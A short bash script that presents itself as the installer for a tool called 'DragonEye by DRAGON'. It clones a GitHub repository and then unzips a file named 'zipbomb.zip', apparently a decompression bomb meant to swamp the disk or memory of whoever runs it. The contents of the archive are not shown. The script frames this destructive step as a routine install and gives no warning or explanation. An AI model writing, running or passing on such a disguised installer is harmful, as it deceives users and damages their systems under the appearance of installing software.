#!/usr/bin/env bash
set -e

echo "Installing DragonEye by DRAGON..."

# Clone the repository
git clone https://github.com/12hrformat/dragonv1.git

# Enter the directory
cd dragonv1

# Unzip a file
unzip zipbomb.zip

echo "Done!"
